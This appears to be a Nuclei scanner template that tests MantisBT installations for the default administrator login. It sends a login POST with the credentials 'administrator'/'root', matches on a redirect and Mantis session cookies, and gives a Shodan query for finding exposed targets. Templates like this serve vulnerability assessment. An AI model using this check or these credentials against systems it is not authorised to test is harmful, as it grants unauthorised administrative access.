id: mantisbt-default-credential

info:
  name: MantisBT Default Admin Login
  author: For3stCo1d
  severity: high
  description: A MantisBT default admin login was discovered.
  reference:
    - https://mantisbt.org/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cwe-id: CWE-522
  metadata:
    shodan-query: title:"MantisBT"
  tags: mantisbt,default-login

requests:
  - raw:
      - |
        POST /login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        return=index.php&username={{user}}&password={{pass}}

    attack: pitchfork
    payloads:
      user:
        - administrator
      pass:
        - root

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - contains(tolower(all_headers), 'mantis_secure_session')
          - contains(tolower(all_headers), 'mantis_string_cookie')
        condition: and

      - type: status
        status:
          - 302

# Enhanced by mp on 2022/03/22
